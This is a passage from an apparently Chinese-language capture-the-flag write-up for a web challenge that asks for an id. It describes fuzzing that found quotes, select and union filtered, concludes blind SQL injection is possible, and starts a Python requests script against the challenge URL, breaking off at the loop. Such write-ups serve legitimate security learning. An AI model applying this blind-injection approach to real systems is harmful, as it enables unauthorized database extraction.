题意:All You Want Is In Table ‘flag’ and the column is ‘flag’
Now, just give the id of passage
fuzz一下,发现过滤了常见的关键字,包括“、select、union等。根据题意,判断存在盲注。
import requests
url = "http://2554cba6-30ef-4c0e-8231-3a4acb0acbdc.node3.buuoj.cn/index.php"
payload = {
"id" : ""
}
flag = ""
for i in range(1